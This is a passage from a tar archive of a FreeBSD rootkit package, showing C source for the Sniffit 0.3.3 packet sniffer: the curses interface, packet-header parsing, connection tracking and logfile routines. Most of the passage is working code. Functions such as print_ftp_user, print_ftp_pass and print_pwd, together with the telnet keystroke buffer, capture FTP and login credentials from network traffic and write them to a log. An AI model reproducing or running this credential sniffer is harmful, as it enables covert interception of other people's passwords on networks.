12ld",(*TCP_bytes_in_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,5,1,"bytes/sec. (UDP) : % 12ld",(*UDP_bytes_in_packets)/INFO_TIMER); screen_busy=0; forced_refresh(); /* reinstall handler, reset alarm */ *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; set_signal(SIGALRM, packet_info_handler); alarm(INFO_TIMER); } /* at/on_exit's */ void child_exit (void) { kill(Pid,SIGKILL); }; void screen_exit (void) { clear(); endwin(); }; void mem_exit (void) { if(shmctl(memory_id,IPC_RMID,0)<0) {perror("Sniffer Hartattack (you are fucked!) ");exit(0);}; } /* Some other stuff */ void stop_logging (void) { LOGGING=0; log_conn->log_enter[0]=0; if(logging_device==NULL) {delwin(data_box.work_window); delwin(data_box.main_window);} forced_refresh(); } void stop_packet_info (void) { PACKET_INFO=0; alarm(0); delwin(packets_box.work_window), delwin(packets_box.main_window); forced_refresh(); } int add_itemlist(char *buffer, char *string) { int i, to_help, to_item; struct shared_conn_data *conn; /*invoked every time a packet comes in */ conn = (struct shared_conn_data *) buffer; for(i=0;ito_help) if(strcmp(conn[i].connection,log_conn->log_enter)!=0) { to_help=conn[i].timeout; to_item=i; } strcpy(conn[to_item].connection, string); conn[to_item].timeout=0; return to_item; } int del_itemlist(char *buffer, char *string) { int i; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; for(i=0;ilog_enter, string)==0) {log_conn->log_enter[0]=0;} return i; } return -1; } void clear_shared_mem(char mode) /* mode = 0 all */ /* mode = 1 keep mask */ /* keep packet count */ { int i; struct shared_conn_data *conn; *timing=1; *DATAlength=0; *LISTlength=-1; if(mode==0) { mask->source_ip=mask->destination_ip=mask->source_port=mask->destination_port=0; *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; } log_conn->log_enter[0]=0; conn = (struct shared_conn_data *) running_connections; for(i=0;i=CONNECTION_CAPACITY+1) return; j=0; strcpy(e_dummy,conn[i].connection); strtok(e_dummy," "); strcpy(esource,strtok(NULL," ")); strcpy(es_port,strtok(NULL," ")); strtok(NULL," "); strcpy(edest,strtok(NULL," ")); strcpy(ed_port,strtok(NULL," ")); } /*** Main interface program */ void run_interface(void) { int i,key_hit; char dummy[50]; char exec_s[20],exec_sp[20],exec_d[20],exec_dp[20]; POINTpos=-1; *LISTlength=-1; LISTpos=0; LOGGING=0; PACKET_INFO=0; screen_busy=0; set_signal (SIGCHLD, SIG_IGN); set_signal(SIGUSR1,interaction); init_screen(); /* The whole screen setup */ f_box_window(&mask_box,MASK_WINDOW_ROWS,MASK_WINDOW_COLS,MASK_WINDOW_Y,MASK_WINDOW_X,0); mask_status(&mask_box); f_box_window(&main_box,MAIN_WINDOW_ROWS,MAIN_WINDOW_COLS,0,0,0); fill_box_window(&main_box, running_connections,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); point_item(&main_box, running_connections,POINTpos,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); menu_window=NULL; menu_line(); doupdate(); /* And..... draw it! */ while(1) { key_hit=wgetch(main_box.work_window); #ifdef DEBUG debug_msg("IntAct: Key Hit Received"); #endif sig_blocking(1, SIGALRM); sig_blocking(1, SIGUSR1); switch(key_hit) { case KEY_DOWN: case 'J': case 'j': if(POINTpos>=*LISTlength) break; if( POINTpos<(LISTpos+(MAIN_WINDOW_ROWS-3)) ) POINTpos++; else {if(LISTpos>=*LISTlength) break; LISTpos++; POINTpos++;}; forced_refresh(); break; case KEY_UP: case 'K': case 'k': if(POINTpos==0) break; if(POINTpos>LISTpos) POINTpos--; else {if(LISTpos==0) break; LISTpos--; POINTpos--;}; forced_refresh(); break; case ENTER: if(*LISTlength<0) break; if(LOGGING==0) { if(logging_device==NULL) data_window(&data_box,&main_box,DATA_WINDOW_ROWS, DATA_WINDOW_COLS,DATA_WINDOW_Y, DATA_WINDOW_X, running_connections,POINTpos); else data_device(running_connections,POINTpos); LOGGING=1; } else { stop_logging(); if(logging_device==NULL) data_window(&data_box,&main_box,DATA_WINDOW_ROWS, DATA_WINDOW_COLS,DATA_WINDOW_Y, DATA_WINDOW_X, running_connections,POINTpos); else data_device(running_connections,POINTpos); LOGGING=1; }; break; case 'N': case 'n': if(PACKET_INFO==0) { f_box_window(&packets_box,INFO_WINDOW_ROWS,INFO_WINDOW_COLS, INFO_WINDOW_Y, INFO_WINDOW_X ,1); PACKET_INFO=1; *IP_nr_of_packets=0; *TCP_nr_of_packets=*TCP_bytes_in_packets=0; *ICMP_nr_of_packets=0; *UDP_nr_of_packets=*UDP_bytes_in_packets=0; packet_info_handler(SIGALRM); } else {stop_packet_info();} break; case 'q': case 'Q': case KEY_F(10): if(LOGGING==1) {stop_logging();} else {kill(Pid,SIGKILL);exit(0);} break; case '1': case KEY_F(1): input_field("Source Ip: ",dummy); mask->source_ip=getaddrbyname(dummy); exec_mask(); break; case '2': case KEY_F(2): input_field("Destination Ip: ",dummy); mask->destination_ip=getaddrbyname(dummy); exec_mask(); break; case '3': case KEY_F(3): input_field("Source Port: ",dummy); mask->source_port=atoi(dummy); exec_mask(); break; case '4': case KEY_F(4): input_field("Destination Port: ",dummy); mask->destination_port=atoi(dummy); exec_mask(); break; case '5': case KEY_F(5): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key5","sniffit_key5",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '6': case KEY_F(6): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key6","sniffit_key6",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '7': case KEY_F(7): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key7","sniffit_key7",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case '8': case KEY_F(8): if(*LISTlength<0) break; create_arguments(exec_s,exec_sp,exec_d, exec_dp,running_connections,POINTpos); if(fork()==0) /* CHILD */ { close(0); close(1); close(2); execl("./sniffit_key8","sniffit_key8",exec_s,exec_sp,exec_d,exec_dp,NULL); exit(0); }; break; case 'r': case 'R': /* mask does an auto reset */ exec_mask(); break; default: break; } sig_blocking(0, SIGALRM); sig_blocking(0, SIGUSR1); } }; fbsdrootkit-1.2/sniffit.0.3.3/sn_logfile.h100600 764 764 2651 6226213211 15526 0ustar dfdf/* Sniffit Logfile include file - Brecht Claerhout */ void logfile_exit (void) /* at/on_exit closing of logfile */ { printf("Sniffit Logging session ended.\n"); print_logline("Sniffit session ended."); fflush(LogFILE); fclose(LogFILE); } char *gettime (void) { time_t t; char *tm; time(&t); tm=ctime(&t); tm[24]=0; return tm; } void print_logline (char *logline) { fprintf(LogFILE,"[%s] - %s\n",gettime(),logline); fflush(LogFILE); } void print_ftp_user (char *conn, char *user) { char line[250]; sprintf(line,"%s: USER [%s]",conn,user); print_logline (line); } void print_ftp_pass(char *conn, char *pass) { char line[250]; sprintf(line,"%s: PASS [%s]",conn,pass); print_logline (line); } void print_login (char *conn, char *login) { char line[250]; sprintf(line,"%s: login [%s]",conn,login); print_logline (line); } void print_pwd (char *conn, char *pwd) { char line[250]; sprintf(line,"%s: password [%s]",conn,pwd); print_logline (line); } void print_conn (char *conn, char *msg) { char line[250]; sprintf(line,"%s: %s",conn,msg); print_logline (line); } void open_logfile (void) { if(Logfile[0]==0) strcpy(Logfile,"sniffit.log"); LogFILE=fopen(Logfile,"a"); if(LogFILE==NULL) printf("Sniffit hardattack.. couldn't create/open logfile...\n"), exit(1); exit_func(logfile_exit); fchmod(LogFILE, S_IWUSR|S_IRUSR); print_logline("Sniffit session started."); printf("Sniffit Logging started. (loglevel: %d)\n",LOGLEVEL); } fbsdrootkit-1.2/sniffit.0.3.3/sn_oldether.h100600 764 764 415 6226213211 15667 0ustar dfdf/* Sniffit old Ethernet File -- Brecht Claerhout */ struct packetheader { struct timeval ts; /* time stamp */ u_long caplen; /* length of portion present */ u_long len; /* length this packet (off wire) */ }; fbsdrootkit-1.2/sniffit.0.3.3/sn_packets.h100600 764 764 13163 6226213211 15557 0ustar dfdf/* Sniffit Packet Discription File -- Brecht Claerhout */ int PROTO_HEAD; /* Base Protocol head length (ethernet, PPP ,....) */ #define ETHERHEAD 14 /* Length Ethernet Packet header */ #define PPPHEAD 4 /* Length PPP Packet header */ #define SLIPHEAD 16 /* Length SLIP Packet header */ #define URG 32 /*TCP-flags */ #define ACK 16 #define PSH 8 #define RST 4 #define SYN 2 #define FIN 1 #define NO_IP 0 #define ICMP 1 /* Protocol Numbers */ #define TCP 6 #define UDP 17 #define ICMP_HEADLENGTH 4 /* fixed ICMP header length */ #define UDP_HEADLENGTH 8 /* fixed UDP header length */ #define IP_DELAY 32 #define IP_THROUGHPUT 16 #define IP_RELIABILITY 8 #define IP_DF 2 #define IP_MF 1 char *IP_TYPE_precedence[8]= {"Routine", "Priority", "Immediate", "Flash", "Flash override", "Critical", "Internetwork control", "Network control"}; char *IP_PROTOCOL_number[34]= {"Reserved","ICMP","IGMP","GGP","Unassigned","ST","TCP","UCL","EGP","IGP", "BBN-MON","NVP-II","PUP","ARGUS","EMCOM","XNET","CHAOS","UDP","MUX", "DCN-MEAS","HMP","PRM","XNS-IDP","TRUNK-1","TRUNK-2","LEAF-1","LEAF-2", "RDP","IRTP","ISO-TP4","NETBLT","MFE-NSP","MERIT-INP","SEP"}; #define ICMP_TYPE_0 "Echo reply" #define ICMP_TYPE_3 "Destination unreachable" #define ICMP_TYPE_4 "Source quench" #define ICMP_TYPE_5 "Redirect" #define ICMP_TYPE_8 "Echo" #define ICMP_TYPE_11 "Time exceeded" #define ICMP_TYPE_12 "Parameter problem" #define ICMP_TYPE_13 "Timestamp" #define ICMP_TYPE_14 "Timestamp reply" #define ICMP_TYPE_15 "Information request" #define ICMP_TYPE_16 "Information reply" #define ICMP_TYPE_17 "Address mask request" #define ICMP_TYPE_18 "Adress mask reply" char *ICMP_type_3_code[6]= {"Net unreachable", "Host unreachable", "Protocol unreachable", "Port unreachable", "Fragmentation needed and DF set", "Source route failed"}; char *ICMP_type_5_code[4]= {"Redirect datagrams for the network", "Redirect datagrams for the host", "Redirect datagrams for the \'type of service\' and the network", "Redirect datagrams for the \'type of service\' and the host"}; char *ICMP_type_11_code[2]= {"Time-to-live exceeded in transmit", "Fragment reassembly time exceeded"}; struct IP_header /* The IPheader (without options) */ { unsigned char verlen, type; unsigned short length, ID, flag_offset; unsigned char TTL, protocol; unsigned short checksum; unsigned long int source, destination; }; struct TCP_header /* The TCP header (without options) */ { unsigned short source, destination; unsigned long int seq_nr, ACK_nr; unsigned short offset_flag, window, checksum, urgent; }; struct ICMP_header /* The ICMP header */ { unsigned char type, code; unsigned short checksum; }; struct UDP_header /* The UDP header */ { unsigned short source, destination; unsigned short length, checksum; }; struct unwrap /* some extra info */ { int IP_len, TCP_len, ICMP_len, UDP_len; /* header lengths */ int DATA_len; }; /* This routine stolen from ping.c */ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; /* leave this alone.. my opinion is that the */ register u_short *w = addr; /* register is needed to make it work for both */ register int sum = 0; /* BIG and LITTLE endian machines */ u_short answer = 0; /* but then again, who am I to make such statement */ while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int unwrap_packet (const unsigned char *sp, struct unwrap *unwrapped) { struct IP_header IPhead; struct TCP_header TCPhead; struct ICMP_header ICMPhead; struct UDP_header UDPhead; int i; memcpy(&IPhead,(sp+PROTO_HEAD),sizeof(struct IP_header)); /* IP header Conversion */ unwrapped->IP_len = (IPhead.verlen & 0xF) << 2; if(NO_CHKSUM == 0) { sp[PROTO_HEAD+10]=0; /* reset checksum to zero, Q&D way*/ sp[PROTO_HEAD+11]=0; if(in_cksum((sp+PROTO_HEAD),unwrapped->IP_len) != IPhead.checksum) { #ifdef DEBUG_ONSCREEN printf("Packet dropped... (invalid IP chksum)\n"); printf("%X %X (len %d)\n",in_cksum((sp+PROTO_HEAD),unwrapped->IP_len),IPhead.checksum,unwrapped->IP_len); #endif return NO_IP; } memcpy((sp+PROTO_HEAD),&IPhead,sizeof(struct IP_header)); /* restore orig buffer */ /* general programming rule */ } if(IPhead.protocol == TCP ) /* TCP */ { memcpy(&TCPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct TCP_header)); unwrapped->TCP_len = ntohs(TCPhead.offset_flag) & 0xF000; unwrapped->TCP_len >>= 10; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->TCP_len); return TCP; } if(IPhead.protocol == ICMP ) /* ICMP */ { memcpy(&ICMPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct ICMP_header)); unwrapped->ICMP_len = ICMP_HEADLENGTH; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->ICMP_len); return ICMP; } if(IPhead.protocol == UDP ) /* UDP */ { memcpy(&UDPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct UDP_header)); unwrapped->UDP_len = UDP_HEADLENGTH; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->UDP_len); return UDP; } return -1; } fbsdrootkit-1.2/sniffit.0.3.3/sniffit.0.3.3.c100600 764 764 110406 6226213211 15540 0ustar dfdf/* Sniffit -- coded by Brecht Claerhout */ /* Time wasted: too much */ /* formatted code and added support for hostname resolution - Godmar Back */ #include "config.h" /* Config header file */ #include "sn_defines.h" /* Various defines */ #include "sn_global.h" /* some global defs */ #include "sn_oldether.h" /* Leftover from 0.0.X and 0.1.X */ #include "sn_packets.h" /* My own packet structs */ #include "sn_data.h" /* data defs */ #include "sn_logfile.h" #ifdef INCLUDE_INTERFACE #include "sn_interface.h" /* all ncurses stuff */ #endif #include "sn_cfgfile.h" /* Config file handling */ static char Copyright[]= "Sniffit - Brecht Claerhout - Copyright 1996"; void quit (char *prog_name) /* Learn to use the program */ { printf( "usage: %s [-xdabvn] [-P proto] [-A char] [-p port]\n" " [-l sniflen] [-L loglevel] [-F snifdevice]\n" #ifdef INCLUDE_INTERFACE " [-D tty]" " (-t | -s)" " | -i | -c\n", #else " (-t | -s) | -c\n", #endif prog_name); exit(0); } void my_exit (void) { exit(0);}; /* DEBUGGING INFO */ #ifdef DEBUG void close_debug_device (void) { fclose(debug_dev); } void debug_msg(char *debug_text) { fprintf(debug_dev,"%s (%d)\n",debug_text,debug_cnt); debug_cnt++; } #endif char *strlower (char *string) { int i; for(i=0;i=MAXCOUNT) { /* remove less effective connection from list */ search_pointer=start_dynam; dummy_pointer=start_dynam; do { if(search_pointer->time_out > last_time_out) {last_time_out=search_pointer->time_out; dummy_pointer=search_pointer;} search_pointer=search_pointer->next; } while(search_pointer != NULL); #ifdef DEBUG debug_msg("Auto timeout engaged (filename follows)"); debug_msg(dummy_pointer->filename); #endif if(dummy_pointer->f==NULL) delete_dynam(dummy_pointer->filename,dummy_pointer->proto,0); else delete_dynam(dummy_pointer->filename,dummy_pointer->proto,1); printf("Too many connections... auto timeout\n"); } if( (dummy_pointer=(struct file_info *)malloc(sizeof(struct file_info))) == NULL) {printf("Couldn't allocate memory.\n"); exit(0);}; dummy_pointer->bytes=0; dummy_pointer->proto=ptype; strcpy(dummy_pointer->filename,file); if(do_file!=0) { f = fopen(file,"a"); if(f==NULL) perror("Couldn't open logfile:"),exit(0); dummy_pointer->f=f; } else { dummy_pointer->f=NULL; } dummy_pointer->next=NULL; dummy_pointer->buffer=NULL; dummy_pointer->log=0; dummy_pointer->exp_seq=cur_seq+len; for(i=0;iscroll_buf[i]=' '; dummy_pointer->scroll_buf[SCBUF]=0; if(start_dynam==NULL) start_dynam=dummy_pointer; else { search_pointer=start_dynam; while(search_pointer->next != NULL) search_pointer=search_pointer->next; search_pointer->next=dummy_pointer; } dynam_len++; return dummy_pointer; } void delete_dynam (char *file, char ptype,char do_file) { struct file_info *search_pointer; struct file_info *dummy_pointer; if(start_dynam==NULL) return; search_pointer=start_dynam; if( (strcmp(search_pointer->filename,file)==0) && (search_pointer->proto==ptype)) { if(do_file!=0) fclose(search_pointer->f); start_dynam=search_pointer->next; dynam_len--; return; } search_pointer=start_dynam; if(search_pointer->next==NULL) return; while(search_pointer->next != NULL) { if( (strcmp(search_pointer->next->filename,file)==0) && (search_pointer->next->proto==ptype)) { if(do_file!=0) fclose(search_pointer->next->f); dummy_pointer=search_pointer->next; search_pointer->next=search_pointer->next->next; if(dummy_pointer->buffer!=NULL) free(dummy_pointer->buffer); free(dummy_pointer); dynam_len--; return; } search_pointer=search_pointer->next; } } /* returns NULL on failure */ struct file_info *search_dynam(char *file, char ptype) { struct file_info *search_pointer; if(start_dynam==NULL) return NULL; search_pointer=start_dynam; /* time_out add */ do { search_pointer->time_out += 1; search_pointer=search_pointer->next; } while(search_pointer != NULL); search_pointer=start_dynam; /* actual search */ do { if( (strcmp(search_pointer->filename,file)==0) && (search_pointer->proto==ptype)) {search_pointer->time_out=0; /* timeout reset */ return search_pointer;} search_pointer=search_pointer->next; } while(search_pointer != NULL); return NULL; } /* Type 0: TELNET */ void record_buf(struct file_info *dummy_pointer, unsigned long cur_seq_nr, char *data, int len, int type) { int i,j,noloop=0; if(dummy_pointer->exp_seq != cur_seq_nr) {return;} noloop=0; for(i=0;ibytes; switch(type) { case 0: if(data[i]==TELNET_ENTER) /* return found */ {dummy_pointer->log++;noloop=1;}; break; default: break; } if(noloop==1) break; if(j>=LOG_PASS_BUF) break; if(isprint(data[i])) {dummy_pointer->buffer[j]=data[i];} else {dummy_pointer->buffer[j]='~';}; dummy_pointer->buffer[j+1]=0; dummy_pointer->bytes+=1; } #ifdef DEBUG_ONSCREEN printf("Record buffer: >%s< (%d)\n",dummy_pointer->buffer,dummy_pointer->bytes); #endif } void sb_shift(struct file_info *dummy_pointer) { int i,j; for(i=1;iscroll_buf[i-1]=dummy_pointer->scroll_buf[i]; } void sbuf_update(struct file_info *dummy_pointer, unsigned long cur_seq_nr, char *data, int len) { int i; if(dummy_pointer->exp_seq != cur_seq_nr) {return;} for(i=0;iscroll_buf[SCBUF-1]=data[i];} else {dummy_pointer->scroll_buf[SCBUF-1]='.';}; } #ifdef DEBUG_ONSCREEN printf("scr_buf: %s\n",dummy_pointer->scroll_buf); #endif } void print_iphead (struct IP_header *iphead, char icmp_or_plain) { int dummy; u_char *so,*dest; if(icmp_or_plain!=0) printf("ICMP message concerned following IP packet:\n"); so=(u_char *)&(iphead->source); dest=(u_char *)&(iphead->destination); printf("from %u.%u.%u.%u to %u.%u.%u.%u\n", so[0],so[1],so[2],so[3], dest[0],dest[1],dest[2],dest[3]); dummy=iphead->type; dummy>>=5; printf("IP Packet precedence: %s (%c%c%c)\n", IP_TYPE_precedence[dummy], (iphead->type&IP_DELAY)?'D':'-', (iphead->type&IP_THROUGHPUT)?'T':'-', (iphead->type&IP_RELIABILITY)?'R':'-'); dummy=ntohs(iphead->flag_offset); dummy>>=13; printf("FLAGS: %s %s Time to live (secs): %d\n", (dummy&IP_DF)?"DF":"--", (dummy&IP_DELAY)?"MF":"--", iphead->TTL); if(iphead->protocol < 34) printf("Protocol (%d): %s\n",iphead->protocol, IP_PROTOCOL_number[iphead->protocol]); else printf("Protocol (%d) not recognised\n",iphead->protocol); printf("\n"); } int check_packet(u_long ipaddr, const struct packetheader *p_header, const u_char *sp, char *file, char *file2, struct unwrap *info, char *detail, int MODE) /* MODE 0: -t MODE 1: -s */ /* MODE 2: -b */ { u_char *so,*dest; char wc_so[20], wc_dest[20]; struct IP_header iphead; struct TCP_header tcphead; struct ICMP_header icmphead; struct UDP_header udphead; int proto; unsigned int prior; char selected; int i; /* Wildcard stuff */ unsigned char *str_IP; unsigned int n_s; /* strlen short notation for wc bugfix */ proto=unwrap_packet(sp, info); if(proto == NO_IP) return DONT_EXAMINE; /* no use in trying */ memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)); so=(u_char *)&(iphead.source); dest=(u_char *)&(iphead.destination); if((proto==TCP)&&(PROTOCOLS&F_TCP)) { memcpy(&tcphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct TCP_header)); memcpy(detail,&tcphead,sizeof(struct TCP_header)); if((WILDCARD==0)&&(CFG_FILE==0)) /* Selection criteria */ { if (MODE == DEST && ipaddr != iphead.destination /* -t */ || MODE == SOURCE && ipaddr != iphead.source /* -s */ || MODE == BOTH && ipaddr != iphead.destination /* -b */ && ipaddr != iphead.source ) return DONT_EXAMINE; /* Check destination/source IP */ } else { if (WILDCARD!=0) /* Wildcards */ { sprintf(wc_so,"%u.%u.%u.%u",so[0],so[1],so[2],so[3]); sprintf(wc_dest,"%u.%u.%u.%u",dest[0],dest[1],dest[2],dest[3]); n_s = strlen(IP); if (MODE == DEST && (strncmp(wc_dest,IP,n_s)!=0) /* -t */ || MODE == SOURCE && (strncmp(wc_so,IP,n_s)!=0) /* -s */ || MODE == BOTH && (strncmp(wc_dest,IP,n_s)!=0) /* -b */ && (strncmp(wc_so,IP,n_s)!=0) ) return DONT_EXAMINE; /* Check destination/source IP */ } else { /* We are using the config file (4*Check) */ prior=0; selected=0; sprintf(wc_so,"%u.%u.%u.%u",so[0],so[1],so[2],so[3]); sprintf(wc_dest,"%u.%u.%u.%u",dest[0],dest[1],dest[2],dest[3]); #ifdef DEBUG_ONSCREEN printf("CONCERNING: %s %d - %s %d\n",wc_so,ntohs(tcphead.source),wc_dest,ntohs(tcphead.destination)); #endif /* Highest prior last (backward+break for speed) */ for(i=(select_from_length-1);i>=0;i--) { if(prior > select_from_list[i].priority) break; str_IP = select_from_list[i].host; #ifdef DEBUG_ONSCREEN printf("SF: %s %d Prior:%d\n",str_IP,select_from_list[i].port,select_from_list[i].priority); #endif if((select_from_list[i].port==0) || (select_from_list[i].port==ntohs(tcphead.source))) { if(select_from_list[i].wildcard==0) { /* NO wildcard */ if(strcmp(wc_so,str_IP)==0) {selected=1; prior=select_from_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_so,str_IP,strlen(str_IP))==0) {selected=1; prior=select_from_list[i].priority; break;} } if(str_IP[0]==0) {selected=1; break;}; } } for(i=(select_to_length-1);i>=0;i--) { if(prior > select_to_list[i].priority) break; str_IP = select_to_list[i].host; #ifdef DEBUG_ONSCREEN printf("ST: %s %d Prior:%d\n",str_IP,select_to_list[i].port,select_to_list[i].priority); #endif if((select_to_list[i].port==0) || (select_to_list[i].port==ntohs(tcphead.destination))) { if(select_to_list[i].wildcard==0) { /* NO wildcard */ if(strcmp(wc_dest,str_IP)==0) {selected=1; prior=select_to_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=1; prior=select_to_list[i].priority; break;} } if(str_IP[0]==0) {selected=1; break;}; } } for(i=(deselect_from_length-1);i>=0;i--) { if(prior > deselect_from_list[i].priority) break; str_IP = deselect_from_list[i].host; #ifdef DEBUG_ONSCREEN printf("DF: %s %d Prior:%d\n",str_IP,deselect_from_list[i].port,deselect_from_list[i].priority); #endif if((deselect_from_list[i].port==0) || (deselect_from_list[i].port==ntohs(tcphead.source))) { if(deselect_from_list[i].wildcard==0) { /* NO wildcard */ if(strcmp(wc_so,str_IP)==0) {selected=0; prior=deselect_from_list[i].priority; break;} } else { /* wildcard */ if(strcmp(wc_so,str_IP)==0) {selected=0; prior=deselect_from_list[i].priority; break;} } if(str_IP[0]==0) {selected=0; break;}; } } for(i=(deselect_to_length-1);i>=0;i--) { if(prior > deselect_to_list[i].priority) break; str_IP = deselect_to_list[i].host; #ifdef DEBUG_ONSCREEN printf("DT: %s %d Prior:%d\n",str_IP,deselect_to_list[i].port,deselect_to_list[i].priority); #endif if((deselect_to_list[i].port==0) || (deselect_to_list[i].port==ntohs(tcphead.destination))) { if(deselect_to_list[i].wildcard==0) { /* NO wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=0; prior=deselect_to_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=0; prior=deselect_to_list[i].priority; break;} } if(str_IP[0]==0) {selected=0; break;}; } } #ifdef DEBUG_ONSCREEN printf("Selected: %d\n",selected); #endif if(selected==0) return DONT_EXAMINE; } } if( DEST_PORT && ntohs(tcphead.destination) != DEST_PORT) return DONT_EXAMINE; /* Check dest. PORT */ /* inet_ntoa gave wrong output sometimes */ sprintf(file,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", so[0],so[1],so[2],so[3], (unsigned short)ntohs(tcphead.source), dest[0],dest[1],dest[2],dest[3], (unsigned short)ntohs(tcphead.destination)); sprintf(file2,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", dest[0],dest[1],dest[2],dest[3], (unsigned short)ntohs(tcphead.destination), so[0],so[1],so[2],so[3], (unsigned short)ntohs(tcphead.source)); if ((ntohs(tcphead.offset_flag) & FIN) != 0) /* check for reset conn. */ return TCP_FINISH; /* packet is a FIN */ /* Used to be for speed, '-x' needs all info, so this too! if (info->DATA_len == 0) return DONT_EXAMINE; */ return TCP_EXAMINE; /* interprete packet */ }; if((proto==ICMP)&&(PROTOCOLS&F_ICMP)) /* ICMP packet checking */ { memcpy(&icmphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct ICMP_header)); memcpy(detail,&icmphead,sizeof(struct ICMP_header)); sprintf(file,"%u.%u.%u.%u > %u.%u.%u.%u", so[0],so[1],so[2],so[3], dest[0],dest[1],dest[2],dest[3]); return ICMP_EXAMINE; }; if((proto==UDP)&&(PROTOCOLS&F_UDP)) /* UDP packet checking */ { memcpy(&udphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct UDP_header)); memcpy(detail,&udphead,sizeof(struct UDP_header)); sprintf(file,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", so[0],so[1],so[2],so[3], ntohs(udphead.source), dest[0],dest[1],dest[2],dest[3], ntohs(udphead.destination)); return UDP_EXAMINE; } return DONT_EXAMINE; } /* Default Processing of packets */ pcap_handler packethandler( u_char *ipaddrpoint, const struct packetheader *p_header, const u_char *sp) { char filename[50], filename2[50],header[SNAPLEN]; FILE *f; struct file_info *dummy_pointer; u_char status=0; char *help; int dummy,finish; /* look out it's signed */ u_long datalen, position, total_length, i, n, ipaddr; struct unwrap info; struct IP_header iphead; struct TCP_header tcphead; struct ICMP_header icmphead; struct IP_header iphead_icmp; struct UDP_header udphead; memcpy(&ipaddr,ipaddrpoint,sizeof(u_long)); finish=check_packet(ipaddr,p_header,sp,filename,filename2,&info,header,SNIFMODE); if(PROTOCOLS & F_IP) memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)), print_iphead(&iphead,0); if(finish==DONT_EXAMINE) return; /* Packet is not for us */ if((DUMPMODE & 32)&&(finish<10)) /* extended info TCP only */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); dummy=ntohs(tcphead.offset_flag); printf("\n"); printf("TCP Packet ID (from_IP.port-to_IP.port): %s\n",filename); printf(" SEQ (hex): %lX ",ntohl(tcphead.seq_nr)); if(dummy&ACK) printf("ACK (hex): %lX\n",ntohl(tcphead.ACK_nr)); printf(" FLAGS: %c%c%c%c%c%c", (dummy&URG)?'U':'-',(dummy&ACK)?'A':'-', (dummy&PSH)?'P':'-',(dummy&RST)?'R':'-', (dummy&SYN)?'S':'-',(dummy&FIN)?'F':'-'); if(dummy&ACK) printf(" Window: %X\n",ntohs(tcphead.window)); else printf("\n"); }; if((finish<10)&&(LOGLEVEL==0)) /* TCP packet */ /* I didn't use flags for later extention, and they */ /* don't come in pairs anyhow */ /* use return instead of else {if}, for later extention */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); switch(DUMPMODE & 223) { case 0: /* LOG mode */ status=0; dummy_pointer=search_dynam(filename, TCP); if(dummy_pointer!=NULL) status=1; /* make a new entry unless it's reset */ if(status==0) { if(finish==TCP_FINISH) return; /* there was never data transmitted */ /* seq_nr & datalen not important here yet */ if((dummy_pointer=add_dynam(filename, TCP, 1, 0, 0))==NULL) return; } f=dummy_pointer->f; if(dummy_pointer->bytes<=SNIFLEN) { const u_char *data = sp+PROTO_HEAD+info.IP_len+info.TCP_len; if(SNIFLEN!=0) dummy_pointer->bytes+=info.DATA_len; /* last packet is written */ /* don't care about length */ if(ASC==0) {for(i=0;i 75) n=0, printf("\n"); if(DUMPMODE & 1) n += printf(" %02X",c); if(DUMPMODE & 2) n += printf(" %c",isprint(c)?c:'.'); } printf("\n\n"); break; default: printf("\nImpossible error! Sniffer Hartattack!\n"); exit(0); } return; } if((finish<10)&&(LOGLEVEL!=0)) /* TCP packet - logfile */ /* This mode will grow, so I just copied the other if() */ /* instead of adding a dumpmode, I think this will keep */ /* things more simpel. Also I use the smart dynam */ /* managment of connections */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); dummy_pointer=search_dynam(filename, TCP); if(dummy_pointer!=NULL) status=1; /* make a new entry unless it's reset */ if(status==0) { if(finish!=TCP_FINISH) 